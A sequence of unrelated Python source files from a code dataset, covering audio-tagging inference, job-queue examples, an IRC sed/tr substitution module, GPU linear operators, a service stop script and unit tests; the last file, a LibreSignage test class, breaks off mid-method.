return cls(name, lat, long, listOfComponets, historicalData)
def currentDemand(self):
'''returns the current demand of this building'''
demandSum = self.historicalData[self.hour];
for component in self.listOfComponets:
demandSum += component.currentDemand()
return demandSum
def update(self, hour):
'''updates the state of all components in this building with the current time'''
self.hour = hour % 24
for component in self.listOfComponets:
component.update(hour)
if __name__ == "__main__":
home = BuildingSim.household("home1", 0, 0)
for hour in range(0, 25):
home.update(hour)
print("----------------------------")
print("Hour: " + str(hour))
        print("Current Demand: " + str(home.currentDemand()))
for comp in home.listOfComponets:
print(comp.state, "\t" + comp.name)
| StarcoderdataPython |
78492 | <filename>vim/inference_rt.py
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import numpy as np
import h5py
import argparse
import time
import logging
from sklearn import metrics
from utils import utilities, data_generator, agument
import tensorflow as tf
slim = tf.contrib.slim
import pandas as pd
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from mfcc import vggish_input as mfcc
from mfcc import vggish_params
import multiprocessing as mp
import audio_sample
try:
import cPickle
except BaseException:
import _pickle as cPickle
# Environment replace Speech
labels = ['Environment', 'Male_speechAND_man_speaking', 'Female_speechAND_woman_speaking'
, 'Child_speechAND_kid_speaking', 'Conversation', 'NarrationAND_monologue'
, 'Babbling', 'Speech_synthesizer', 'Shout', 'Bellow', 'Whoop', 'Yell'
, 'Battle_cry', 'Children_shouting', 'Screaming', 'Whispering', 'Laughter'
, 'Baby_laughter', 'Giggle', 'Snicker', 'Belly_laugh', 'ChuckleAND_chortle'
, 'CryingAND_sobbing', 'Baby_cryAND_infant_cry', 'Whimper', 'WailAND_moan'
, 'Sigh', 'Singing', 'Choir', 'Yodeling', 'Chant', 'Mantra', 'Male_singing'
, 'Female_singing', 'Child_singing', 'Synthetic_singing', 'Rapping', 'Humming'
, 'Groan', 'Grunt', 'Whistling', 'Breathing', 'Wheeze', 'Snoring', 'Gasp', 'Pant'
, 'Snort', 'Cough', 'Throat_clearing', 'Sneeze', 'Sniff', 'Run', 'Shuffle'
, 'WalkAND_footsteps', 'ChewingAND_mastication', 'Biting', 'Gargling'
, 'Stomach_rumble', 'BurpingAND_eructation', 'Hiccup', 'Fart', 'Hands'
, 'Finger_snapping', 'Clapping', 'Heart_soundsAND_heartbeat', 'Heart_murmur'
, 'Cheering', 'Applause', 'Chatter', 'Crowd'
, 'HubbubAND_speech_noiseAND_speech_babble', 'Children_playing', 'Animal'
, 'Domestic_animalsAND_pets', 'Dog', 'Bark', 'Yip', 'Howl', 'Bow-wow', 'Growling'
, 'Whimper_(dog)', 'Cat', 'Purr', 'Meow', 'Hiss', 'Caterwaul'
, 'LivestockAND_farm_animalsAND_working_animals', 'Horse', 'Clip-clop'
, 'NeighAND_whinny', 'CattleAND_bovinae', 'Moo', 'Cowbell', 'Pig', 'Oink', 'Goat'
, 'Bleat', 'Sheep', 'Fowl', 'ChickenAND_rooster', 'Cluck'
, 'CrowingAND_cock-a-doodle-doo', 'Turkey', 'Gobble', 'Duck', 'Quack', 'Goose'
, 'Honk', 'Wild_animals', 'Roaring_cats_(lionsAND_tigers)', 'Roar', 'Bird'
, 'Bird_vocalizationAND_bird_callAND_bird_song', 'ChirpAND_tweet', 'Squawk'
, 'PigeonAND_dove', 'Coo', 'Crow', 'Caw', 'Owl', 'Hoot'
, 'Bird_flightAND_flapping_wings', 'CanidaeAND_dogsAND_wolves'
, 'RodentsAND_ratsAND_mice', 'Mouse', 'Patter', 'Insect', 'Cricket', 'Mosquito'
, 'FlyAND_housefly', 'Buzz', 'BeeAND_waspAND_etc.', 'Frog', 'Croak', 'Snake'
, 'Rattle', 'Whale_vocalization', 'Music', 'Musical_instrument'
, 'Plucked_string_instrument', 'Guitar', 'Electric_guitar', 'Bass_guitar'
, 'Acoustic_guitar', 'Steel_guitarAND_slide_guitar'
, 'Tapping_(guitar_technique)', 'Strum', 'Banjo', 'Sitar', 'Mandolin', 'Zither'
, 'Ukulele', 'Keyboard_(musical)', 'Piano', 'Electric_piano', 'Organ'
, 'Electronic_organ', 'Hammond_organ', 'Synthesizer', 'Sampler', 'Harpsichord'
, 'Percussion', 'Drum_kit', 'Drum_machine', 'Drum', 'Snare_drum', 'Rimshot'
, 'Drum_roll', 'Bass_drum', 'Timpani', 'Tabla', 'Cymbal', 'Hi-hat', 'Wood_block'
, 'Tambourine', 'Rattle_(instrument)', 'Maraca', 'Gong', 'Tubular_bells'
, 'Mallet_percussion', 'MarimbaAND_xylophone', 'Glockenspiel', 'Vibraphone'
, 'Steelpan', 'Orchestra', 'Brass_instrument', 'French_horn', 'Trumpet'
, 'Trombone', 'Bowed_string_instrument', 'String_section', 'ViolinAND_fiddle'
, 'Pizzicato', 'Cello', 'Double_bass'
, 'Wind_instrumentAND_woodwind_instrument', 'Flute', 'Saxophone', 'Clarinet'
, 'Harp', 'Bell', 'Church_bell', 'Jingle_bell', 'Bicycle_bell', 'Tuning_fork'
, 'Chime', 'Wind_chime', 'Change_ringing_(campanology)', 'Harmonica'
, 'Accordion', 'Bagpipes', 'Didgeridoo', 'Shofar', 'Theremin', 'Singing_bowl'
, 'Scratching_(performance_technique)', 'Pop_music', 'Hip_hop_music'
, 'Beatboxing', 'Rock_music', 'Heavy_metal', 'Punk_rock', 'Grunge'
, 'Progressive_rock', 'Rock_and_roll', 'Psychedelic_rock', 'Rhythm_and_blues'
, 'Soul_music', 'Reggae', 'Country', 'Swing_music', 'Bluegrass', 'Funk'
, 'Folk_music', 'Middle_Eastern_music', 'Jazz', 'Disco', 'Classical_music'
, 'Opera', 'Electronic_music', 'House_music', 'Techno', 'Dubstep'
, 'Drum_and_bass', 'Electronica', 'Electronic_dance_music', 'Ambient_music'
, 'Trance_music', 'Music_of_Latin_America', 'Salsa_music', 'Flamenco', 'Blues'
, 'Music_for_children', 'New-age_music', 'Vocal_music', 'A_capella'
, 'Music_of_Africa', 'Afrobeat', 'Christian_music', 'Gospel_music'
, 'Music_of_Asia', 'Carnatic_music', 'Music_of_Bollywood', 'Ska'
, 'Traditional_music', 'Independent_music', 'Song', 'Background_music'
, 'Theme_music', 'Jingle_(music)', 'Soundtrack_music', 'Lullaby'
, 'Video_game_music', 'Christmas_music', 'Dance_music', 'Wedding_music'
, 'Happy_music', 'Funny_music', 'Sad_music', 'Tender_music', 'Exciting_music'
, 'Angry_music', 'Scary_music', 'Wind', 'Rustling_leaves'
, 'Wind_noise_(microphone)', 'Thunderstorm', 'Thunder', 'Water', 'Rain'
, 'Raindrop', 'Rain_on_surface', 'Stream', 'Waterfall', 'Ocean', 'WavesAND_surf'
, 'Steam', 'Gurgling', 'Fire', 'Crackle', 'Vehicle', 'BoatAND_Water_vehicle'
, 'SailboatAND_sailing_ship', 'RowboatAND_canoeAND_kayak'
, 'MotorboatAND_speedboat', 'Ship', 'Motor_vehicle_(road)', 'Car'
, 'Vehicle_hornAND_car_hornAND_honking', 'Toot', 'Car_alarm'
, 'Power_windowsAND_electric_windows', 'Skidding', 'Tire_squeal'
, 'Car_passing_by', 'Race_carAND_auto_racing', 'Truck', 'Air_brake'
, 'Air_hornAND_truck_horn', 'Reversing_beeps'
, 'Ice_cream_truckAND_ice_cream_van', 'Bus', 'Emergency_vehicle'
, 'Police_car_(siren)', 'Ambulance_(siren)'
, 'Fire_engineAND_fire_truck_(siren)', 'Motorcycle'
, 'Traffic_noiseAND_roadway_noise', 'Rail_transport', 'Train', 'Train_whistle'
, 'Train_horn', 'Railroad_carAND_train_wagon', 'Train_wheels_squealing'
, 'SubwayAND_metroAND_underground', 'Aircraft', 'Aircraft_engine'
, 'Jet_engine', 'PropellerAND_airscrew', 'Helicopter'
, 'Fixed-wing_aircraftAND_airplane', 'Bicycle', 'Skateboard', 'Engine'
, 'Light_engine_(high_frequency)', "Dental_drillAND_dentist's_drill"
, 'Lawn_mower', 'Chainsaw', 'Medium_engine_(mid_frequency)'
, 'Heavy_engine_(low_frequency)', 'Engine_knocking', 'Engine_starting'
, 'Idling', 'AcceleratingAND_revvingAND_vroom', 'Door', 'Doorbell', 'Ding-dong'
, 'Sliding_door', 'Slam', 'Knock', 'Tap', 'Squeak', 'Cupboard_open_or_close'
, 'Drawer_open_or_close', 'DishesAND_potsAND_and_pans'
, 'CutleryAND_silverware', 'Chopping_(food)', 'Frying_(food)'
, 'Microwave_oven', 'Blender', 'Water_tapAND_faucet'
, 'Sink_(filling_or_washing)', 'Bathtub_(filling_or_washing)', 'Hair_dryer'
, 'Toilet_flush', 'Toothbrush', 'Electric_toothbrush', 'Vacuum_cleaner'
, 'Zipper_(clothing)', 'Keys_jangling', 'Coin_(dropping)', 'Scissors'
, 'Electric_shaverAND_electric_razor', 'Shuffling_cards', 'Typing'
, 'Typewriter', 'Computer_keyboard', 'Writing', 'Alarm', 'Telephone'
, 'Telephone_bell_ringing', 'Ringtone', 'Telephone_dialingAND_DTMF'
, 'Dial_tone', 'Busy_signal', 'Alarm_clock', 'Siren', 'Civil_defense_siren'
, 'Buzzer', 'Smoke_detectorAND_smoke_alarm', 'Fire_alarm', 'Foghorn', 'Whistle'
, 'Steam_whistle', 'Mechanisms', 'RatchetAND_pawl', 'Clock', 'Tick', 'Tick-tock'
, 'Gears', 'Pulleys', 'Sewing_machine', 'Mechanical_fan', 'Air_conditioning'
, 'Cash_register', 'Printer', 'Camera', 'Single-lens_reflex_camera', 'Tools'
, 'Hammer', 'Jackhammer', 'Sawing', 'Filing_(rasp)', 'Sanding', 'Power_tool'
, 'Drill', 'Explosion', 'GunshotAND_gunfire', 'Machine_gun', 'Fusillade'
, 'Artillery_fire', 'Cap_gun', 'Fireworks', 'Firecracker', 'BurstAND_pop'
, 'Eruption', 'Boom', 'Wood', 'Chop', 'Splinter', 'Crack', 'Glass'
, 'ChinkAND_clink', 'Shatter', 'Liquid', 'SplashAND_splatter', 'Slosh', 'Squish'
, 'Drip', 'Pour', 'TrickleAND_dribble', 'Gush', 'Fill_(with_liquid)', 'Spray'
, 'Pump_(liquid)', 'Stir', 'Boiling', 'Sonar', 'Arrow'
, 'WhooshAND_swooshAND_swish', 'ThumpAND_thud', 'Thunk', 'Electronic_tuner'
, 'Effects_unit', 'Chorus_effect', 'Basketball_bounce', 'Bang', 'SlapAND_smack'
, 'WhackAND_thwack', 'SmashAND_crash', 'Breaking', 'Bouncing', 'Whip', 'Flap'
, 'Scratch', 'Scrape', 'Rub', 'Roll', 'Crushing', 'CrumplingAND_crinkling'
, 'Tearing', 'BeepAND_bleep', 'Ping', 'Ding', 'Clang', 'Squeal', 'Creak', 'Rustle'
, 'Whir', 'Clatter', 'Sizzle', 'Clicking', 'Clickety-clack', 'Rumble', 'Plop'
, 'JingleAND_tinkle', 'Hum', 'Zing', 'Boing', 'Crunch', 'Silence', 'Sine_wave'
, 'Harmonic', 'Chirp_tone', 'Sound_effect', 'Pulse', 'InsideAND_small_room'
, 'InsideAND_large_room_or_hall', 'InsideAND_public_space'
, 'OutsideAND_urban_or_manmade', 'OutsideAND_rural_or_natural'
, 'Reverberation', 'Echo', 'Noise', 'Environmental_noise', 'Static', 'Mains_hum'
, 'Distortion', 'Sidetone', 'Cacophony', 'White_noise', 'Pink_noise'
, 'Throbbing', 'Vibration', 'Television', 'Radio', 'Field_recording']
_TOTAL_NUM_CLASS = 527
__FILE_CLASS_LABELS = '../audiosetdl/class_labels_indices.csv'
# MODEL_PATH = 'work/models/main/balance_type=balance_in_batch/model_type=decision_level_average_pooling/'
MODEL_PATH = 'checkpoints_transfer/'
meta_path = MODEL_PATH + 'model.ckpt-{}.meta'.format(40000)
model_path = MODEL_PATH + 'model.ckpt-{}'.format(40000)
_DURATION = 3 # seconds
def print_prediction(out, mfcclen):
# print('mfcclen', mfcclen)
sorted_out = np.argsort(-out)
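    # Show the top three predictions; probabilities above 0.8 (excluding class
    # index 0) are highlighted in green via ANSI escape codes.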
# print(out[sorted_out[:100]])
for i in range(3):
prob = out[sorted_out[i]]
if prob > 0.8 and (sorted_out[i] != 0):
print("\033[1;32;40m{} \t prob: {}\033[0m".format (labels[sorted_out[i]], prob))
elif prob > 0.3:
print('{} \t prob: {}'.format(labels[sorted_out[i]], prob))
# print('')
def get_name_list(audio_path):
result = []
flist = os.listdir(audio_path)
for afile in flist:
if os.path.basename(afile).split('.')[-1] == 'wav': # name.wav.short bug fix
afile_path = bytes(os.path.join(audio_path, afile), encoding='utf-8')
result.append(afile_path)
return result
def raw2mfcc(raw_wav_data):
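    # Normalize 16-bit PCM samples to [-1, 1], compute feature frames, and
    # pad or truncate the result to a fixed length of 240 frames.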
raw_wav_data = np.array(raw_wav_data)
try:
amfcc = mfcc.waveform_to_examples(raw_wav_data / 32768.0, 16000)
alen = amfcc.shape[0]
if (alen < 240):
amfcc = np.concatenate((amfcc, np.zeros(shape=((240 - alen), amfcc.shape[1]))), axis=0)
elif (alen > 240):
alen = 240
amfcc = amfcc[:240]
    except Exception as e:
        print('Error while processing audio: {} '.format(e))
        # Re-raise so the caller never receives undefined amfcc/alen.
        raise
    return amfcc, alen
def core(args):
data_dir = args.data_dir
workspace = args.workspace
filename = args.filename
model_type = args.model_type
# model = args.model
q = mp.Queue (maxsize=20)
# Load data
load_time = time.time()
# tensorflow graph
saver = tf.train.import_meta_graph(meta_path) # import graph
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
with tf.Session(config=config) as sess:
saver.restore(sess, model_path) # graph = tf.get_default_graph()
# Locate all the tensors and ops we need for the training loop.
features_tensor = sess.graph.get_tensor_by_name(
vggish_params.INPUT_TENSOR_NAME)
sequence_length_tensor = sess.graph.get_tensor_by_name(
'vggish/input_sequence_length:0')
output_tensor = sess.graph.get_tensor_by_name(
'mix/prediction:0')
mp.Process (target = audio_sample.core, args = (q,)).start() # start audio sample
combined = []
_960ms = []
while True:
_960ms = q.get()
# print(q.qsize())
while q.qsize() > 0:
_960ms = q.get()
combined += _960ms
if (len(combined) / audio_sample.buf_size) >= _DURATION:
# print('combined', len(combined))
test_x_mfcc, test_x_len = raw2mfcc(combined)
[[output], sl] = sess.run([output_tensor, sequence_length_tensor], feed_dict={features_tensor: [test_x_mfcc,], sequence_length_tensor: [test_x_len,]}) #output = model.predict(input)
print_prediction(output, sl)
combined[0:len(_960ms)] = []
| StarcoderdataPython |
128957 | import time
from datetime import timedelta
from django.db import transaction
from dpq.queue import AtLeastOnceQueue
from dpq.decorators import repeat
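# Example task handlers for dpq (assumed to be django-postgres-queue); each
# handler receives the queue instance and the job record being processed.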
def foo(queue, job):
transaction.on_commit(lambda: 1/0)
print('foo {}'.format(job.args))
def timer(queue, job):
print(time.time() - job.args['time'])
def n_times(queue, job):
print('n_times', job.args['count'])
if job.args['count'] > 1:
queue.enqueue(job.task, {'count': job.args['count'] - 1})
@repeat(timedelta(seconds=1))
def repeater(queue, job):
print('repeat {}; eta {}'.format(job, job.execute_at))
def long_task(queue, job):
print('job started: {}'.format(job.id))
time.sleep(10)
print('job finished: {}'.format(job.id))
queue = AtLeastOnceQueue(
notify_channel='channel',
tasks={
'foo': foo,
'timer': timer,
'repeater': repeater,
'n_times': n_times,
'long_task': long_task,
},
)
| StarcoderdataPython |
4829892 | <filename>20-no-commitment/plugins-src/words1.py
import sys, re, string
def extract_words(path_to_file):
"""
Takes a path to a file and returns the non-stop
words, after properly removing nonalphanumeric chars
and normalizing for lower case
"""
if type(path_to_file) is not str or not path_to_file:
return []
try:
with open(path_to_file) as f:
str_data = f.read()
except IOError as e:
print "I/O error({0}) when opening {1}: {2}".format(e.errno, path_to_file, e.strerror)
return []
    pattern = re.compile(r'[\W_]+')
word_list = pattern.sub(' ', str_data).lower().split()
try:
with open('../stop_words.txt') as f:
stop_words = f.read().split(',')
except IOError as e:
print "I/O error({0}) when opening ../stops_words.txt: {1}".format(e.errno, e.strerror)
return []
stop_words.extend(list(string.ascii_lowercase))
return [w for w in word_list if not w in stop_words]
| StarcoderdataPython |
3335486 | <reponame>victorjourne/ezibpy
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# ezIBpy: a Pythonic Client for Interactive Brokers API
# https://github.com/ranaroussi/ezibpy
#
# Copyright 2015-2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = "1.12.70"
__author__ = "<NAME>"
__all__ = ['ezIBpy', 'dataTypes', 'utils']
from ezibpy.ezibpy import ezIBpy
from ezibpy.utils import dataTypes
import ezibpy.utils as utils
| StarcoderdataPython |
107774 | <reponame>Saicharan67/Interview-Coding-Questions
"""
Given an array of non-negative integers, determine whether it can be split into two subsets of equal sum.
"""
dp = ([[False for i in range(50)]
for i in range(10)])
def EqualSumDp(a, n):
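    # Subset-sum DP: dp[i][j] is True when some subset of the first i elements
    # sums to j. The table is pre-allocated at a fixed 10 x 50 size, so this
    # only works while n < 10 and half the total sum < 50.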
s = sum(a)
if s & 1:
return False
s = s//2
for j in range(n+1):
dp[j][0] = True
for j in range(1, s+1):
dp[0][j] = False
for i in range(1, n+1):
for j in range(1, s+1):
dp[i][j] = dp[i-1][j]
if a[i-1] <= j:
dp[i][j] |= dp[i-1][j-a[i-1]]
print(dp)
return dp[n][s]
print(EqualSumDp([1, 5, 5, 11], 4))
| StarcoderdataPython |
147497 | <gh_stars>10-100
import csv
symptomlist = ['suicidal','hallucinations auditory','irritable mood','agitation']
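# For every symptom, collect the diseases in bucketmap.csv that list it, then
# emit Gephi-style node and edge CSV files.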
disease_ = []
disease_list = []
for s in symptomlist:
with open("bucketmap.csv","rb") as csvfile:
reader = csv.reader(csvfile)
for row in reader:
if s in row:
disease_.append((row[0],s))
disease_list.append(row[0])
with open("node.csv","wb") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(["Id","Label","Attribute"])
for n in symptomlist:
writer.writerow([n,n,"Symptom"])
for d in disease_list:
writer.writerow([d,d,"Disease"])
with open("edge.csv","wb") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(["Source","Target"])
for d in disease_:
dis,sym = d
writer.writerow([dis,sym]) | StarcoderdataPython |
1677920 | <gh_stars>10-100
from .modules import Module, Dropout
| StarcoderdataPython |
185858 |
from opymize import Variable, LinOp
from opymize.linear.sparse import idxop, einsumop
import numba
import numpy as np
from numpy.linalg import norm
try:
import opymize.tools.gpu
from opymize.tools.gpu import prepare_kernels
from pkg_resources import resource_stream
except:
# no cuda support
pass
def indexedmult_prepare_gpu(B, P, x, type_t="double"):
J = B.shape[0]
K = x[0]['shape'][1]
L = B.shape[2]
M = B.shape[1]
N = x[0]['shape'][0]
constvars = {
'J': J, 'K': K, 'L': L, 'M': M, 'N': N,
'P': P, 'B': B, 'TYPE_T': type_t
}
files = [resource_stream('opymize.linear', 'indexed.cu')]
templates = [
("indexedmult", "PP", (N, J, M), (32, 24, 1)),
("indexedmultadj", "PP", (N, 1, 1), (512, 1, 1))
]
return prepare_kernels(files, templates, constvars)
class IndexedMultAdj(LinOp):
""" for k,l,i do (Ax)[i,P[j,l]] -= \sum_m B[j,m,l] * x[j,i,m] """
def __init__(self, K, N, P, B, adjoint=None):
LinOp.__init__(self)
assert P.shape[0] == B.shape[0]
assert P.shape[1] == B.shape[2]
self.x = Variable((B.shape[0],N,B.shape[1]))
self.y = Variable((N,K))
self.P = P
self.B = B
if adjoint is None:
self.adjoint = IndexedMult(K, N, B, P, adjoint=self)
else:
self.adjoint = adjoint
self._kernel = None
self.spmat = self.adjoint.spmat.T
def prepare_gpu(self, kernels=None, type_t="double"):
if self._kernel is not None: return
if kernels is None:
kernels = indexedmult_prepare_gpu(self.B, self.P, self.y, type_t=type_t)
self._kernel = kernels['indexedmultadj']
self.adjoint.prepare_gpu(kernels, type_t=type_t)
def _call_gpu(self, x, y=None, add=False):
assert y is not None
if not add: y.fill(0.0)
self._kernel(x, y)
class IndexedMult(LinOp):
""" (Ax)[j,i,m] -= \sum_l B[j,m,l] * x[i,P[j,l]] """
def __init__(self, K, N, B, P, adjoint=None):
LinOp.__init__(self)
assert P.shape[0] == B.shape[0]
assert P.shape[1] == B.shape[2]
self.x = Variable((N,K))
self.y = Variable((B.shape[0],N,B.shape[1]))
self.P = P
self.B = B
self._kernel = None
spP = [idxop(Pj, K) for Pj in P]
spP = einsumop("jlk,ik->jil", spP, dims={ 'i': N })
self.spmat = -einsumop("jml,jil->jim", B, dims={ 'i': N }).dot(spP)
if adjoint is None:
self.adjoint = IndexedMultAdj(K, N, P, B, adjoint=self)
else:
self.adjoint = adjoint
def prepare_gpu(self, kernels=None, type_t="double"):
if self._kernel is not None: return
if kernels is None:
kernels = indexedmult_prepare_gpu(self.B, self.P, self.x, type_t=type_t)
self._kernel = kernels['indexedmult']
self.adjoint.prepare_gpu(kernels, type_t=type_t)
def _call_gpu(self, x, y=None, add=False):
assert y is not None
if not add: y.fill(0.0)
self._kernel(x, y)
| StarcoderdataPython |
50526 | <filename>modules/sed.py
import re
import string
from util.esc import unescape
"""
The 'tr' implementation was based on github:ikegami-yukino/python-tr.
"""
all = [chr(i) for i in range(256)]
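# Expand POSIX-style character classes (e.g. [:alpha:]) and a-b ranges in a
# tr/y/// operand into an explicit string of characters.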
def mklist(src):
src = src.replace("\\/", "/") \
.replace("[:upper:]", string.ascii_uppercase) \
.replace("[:lower:]", string.ascii_lowercase) \
.replace("[:alpha:]", string.ascii_letters) \
.replace("[:digit:]", string.digits) \
.replace("[:xdigit:]", string.hexdigits) \
.replace("[:alnum:]", string.digits + string.ascii_letters) \
.replace("[:blank:]", string.whitespace) \
.replace("[:punct:]", string.punctuation) \
.replace("[:cntrl:]", "".join([i for i in all if i not in string.printable])) \
.replace("[:print:]", string.printable)
lst = []
bs = False
hy = False
for ch in src:
if ch == "\\":
if not bs: bs = True
continue
elif ch == "-" and not bs:
hy = True
continue
elif hy:
lst.extend(range(lst[-1] + 1, ord(ch)))
lst.append(ord(ch))
bs = False
hy = False
return "".join([chr(i) for i in lst])
def squeeze(lst, src):
for ch in lst:
src = re.sub(ch + r"{2,}", ch, src)
return src
def tr(frm, to, src):
return src.translate(str.maketrans(frm, to))
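# 0x16 is the IRC reverse-video control code; wrapping the replacement in it
# highlights the substituted text in the echoed message.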
def create_sub_function(rhs):
return lambda matchobj: "\x16{0}\x16".format(rhs)
class SedModule:
subre = re.compile(r"^(?:(\S+)[:,]\s)?(?:s|(.+?)/s)/((?:\\/|[^/])+)\/((?:\\/|[^/])*?)/([gixs]{0,4})?(?: .*)?$")
trre = re.compile("^(?:(\S+)[:,]\s)?(?:y|(.+?)/y)/((?:\\/|[^/])+)\/((?:\\/|[^/])*?)/([cds]{0,3})?(?: .*)?$")
def __init__(self, circa):
self.circa = circa
self.events = {
"message": [self.sub, self.tr]
}
self.docs = "Performs sed's s/// and y/// functions.\n" \
"[<nick>: ][<search>/]s/<pattern>/<replacement>/[gixs] → performs s/// on the last line in nick's messages that matches the search pattern.\n" \
"[<nick>: ][<search>/]y/<set1>/<set2>/[cds] → performs y/// on the last line in nick's messages that matches the search pattern.\n" \
"See online docs for more info."
def sub(self, fr, to, msg, m):
match = self.subre.match(msg)
if match:
target, search, lhs, rhs, flags = match.groups()
user = target or fr
msgs = reversed(self.circa.channels[to[1:]].users[user].messages)
msgs = [line for line in msgs if not self.subre.match(line)]
if search:
msgs = [line for line in msgs if search.lower() in line.lower()]
msgs = [line for line in msgs if re.search(lhs, line)]
if len(msgs):
u = msgs[0]
f = 0
if "i" in flags: f |= re.I
rhs = rhs.replace("\\/", "/")
rhs = re.sub(r"(?<!\\)(\\)(?=\d+|g<\w+>)", r"\\\\", rhs)
rhs = unescape(rhs)
count = int("g" not in flags)
t = u[len("\x01ACTION "):] if u.startswith("\x01ACTION ") else u
t = re.sub(lhs, create_sub_function(rhs), t, count=count, flags=f)
t = t.replace("\n", " ").replace("\r", " ")
if u.startswith("\x01ACTION ") or t.startswith("\x01ACTION "):
if t.startswith("\x01ACTION "):
t = t[len("\x01ACTION "):]
t = t.replace("\x01", "")
self.circa.say(to, "\x02* {0}\x02 {1}".format(user, t))
else:
self.circa.say(to, "<{0}> {1}".format(user, t))
def tr(self, fr, to, msg, m):
match = self.trre.match(msg)
if match:
target, search, lhs, rhs, flags = match.groups()
user = target or fr
msgs = reversed(self.circa.channels[to[1:]].users[user].messages)
msgs = [line for line in msgs if not self.trre.match(line)]
if search:
msgs = [line for line in msgs if search.lower() in line.lower()]
lhslst = mklist(lhs)
rhslst = unescape(mklist(rhs.replace("\\/", "/")).replace("\\", "\\\\"))
find = [c for c in all if c not in lhslst] if "c" in flags else lhslst
msgs = [line for line in msgs if len(set(line) & set(find))]
if len(msgs):
u = msgs[0]
t = u[len("\x01ACTION "):] if u.startswith("\x01ACTION ") else u
if "d" in flags:
todel = lhslst[len(rhslst):]
lhslst = lhslst[:len(rhslst)]
t = "".join([c for c in t if c not in todel])
else:
if len(rhslst) < len(lhslst):
rhslst += "".join([rhslst[-1]] * (len(lhslst) - len(rhslst)))
else:
rhslst = rhslst[:len(lhslst)]
t = tr(lhslst, rhslst, t)
if "s" in flags:
t = squeeze(rhslst, t)
t = t.replace("\n", " ").replace("\r", " ")
if u.startswith("\x01ACTION "):
t = t.replace("\x01", "")
self.circa.say(to, "\x02* {0}\x02 {1}".format(user, t))
else:
self.circa.say(to, "<{0}> {1}".format(user, t))
module = SedModule
| StarcoderdataPython |
3363177 | <filename>distro/src/bin/atlas_stop.py
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from signal import SIGTERM
import sys
import traceback
import atlas_config as mc
def main():
metadata_home = mc.metadataDir()
confdir = mc.dirMustExist(mc.confDir(metadata_home))
mc.executeEnvSh(confdir)
piddir = mc.dirMustExist(mc.logDir(metadata_home))
metadata_pid_file = mc.pidFile(metadata_home)
try:
pf = file(metadata_pid_file, 'r')
pid = int(pf.read().strip())
pf.close()
except:
pid = None
if not pid:
sys.stderr.write("No process ID file found. Server not running?\n")
return
os.kill(pid, SIGTERM)
# assuming kill worked since process check on windows is more involved...
if os.path.exists(metadata_pid_file):
os.remove(metadata_pid_file)
if __name__ == '__main__':
try:
returncode = main()
except Exception as e:
print "Exception: %s " % str(e)
print traceback.format_exc()
returncode = -1
sys.exit(returncode)
| StarcoderdataPython |
3228799 | import numpy as np
import tensorflow as tf
from unittest import TestCase
from .context import conv_gp
from conv_gp.views import RandomPartialView, FullView
from conv_gp.mean_functions import PatchwiseConv2d, Conv2dMean
class TestMeanFunction(TestCase):
def test_patchwise_conv(self):
filter_size = 5
patch_count = 9
view = RandomPartialView((28, 28), filter_size, 1, patch_count)
mean = PatchwiseConv2d(filter_size, 1, 3, 3)
images = np.random.randn(10, 28, 28, 1)
PNL_patches = view.extract_patches_PNL(images)
sess = mean.enquire_session()
mean_patches = sess.run(mean(PNL_patches))
self.assertEqual(mean_patches.shape[0], 10)
self.assertEqual(mean_patches.shape[1], 9)
def test_full_patchwise_conv(self):
filter_size = 5
patch_count = 9
view = FullView((28, 28), filter_size, 1)
mean = PatchwiseConv2d(filter_size, 1, 24, 24)
images = np.random.randn(10, 28, 28, 1)
PNL_patches = view.extract_patches_PNL(images)
sess = mean.enquire_session()
mean_patches = sess.run(mean(PNL_patches))
self.assertEqual(mean_patches.shape[0], 10)
self.assertEqual(mean_patches.shape[1], 576)
conv_mean = Conv2dMean(filter_size, 1)
conv_mean_patches = sess.run(conv_mean(images))
self.assertEqual(conv_mean_patches.shape, mean_patches.shape)
def test_feature_maps(self):
full_conv = Conv2dMean(3, 1, 3)
random_input = np.random.randn(4, 28, 28, 1)
sess = full_conv.enquire_session()
convolved = sess.run(full_conv(random_input))
self.assertEqual(convolved.shape, (4, 676*3))
| StarcoderdataPython |
82060 | <reponame>faragher/LibreSignage
#!/usr/bin/env python3
#
# Main test unit class.
#
import requests;
from requests.models import Response;
from typing import Callable, Dict, Any, List;
from resptypes import RespVal;
from uniterr import *;
import json;
import sys;
import re;
class Unit:
# HTTP methods.
METHOD_GET: str = "GET";
METHOD_POST: str = "POST";
# Response mimetypes.
MIME_TEXT: str = "text/plain";
MIME_JSON: str = "application/json";
resp_mime: str = "";
def __init__( self,
host: str,
name: str,
url: str,
request_method: str,
preexec: Callable[[], Dict[str, Any]],
postexec: Callable[[bool, Response], None],
data_request: Any,
headers_request: Dict[str, str],
cookies_request: Any,
data_expect_strict: bool,
headers_expect_strict: bool,
status_expect: int,
data_expect: Any,
headers_expect: Dict[str, RespVal]) -> None:
self.host = host;
self.name = name;
self.url = url;
if (request_method == self.METHOD_GET or
request_method == self.METHOD_POST):
self.request_method = request_method;
self.preexec = preexec;
self.postexec = postexec;
self.data_request = data_request;
self.headers_request = headers_request;
self.cookies_request = cookies_request;
self.headers_expect_strict = headers_expect_strict;
self.data_expect_strict = data_expect_strict;
self.status_expect = status_expect;
self.data_expect = data_expect;
self.headers_expect = headers_expect;
def run(self) -> None:
ret: List[UnitError] = [];
req = Response();
status = True;
data: str = "";
params: Dict[str, str] = {};
print("== " + self.name + ": ");
# Run the preexec function and set the
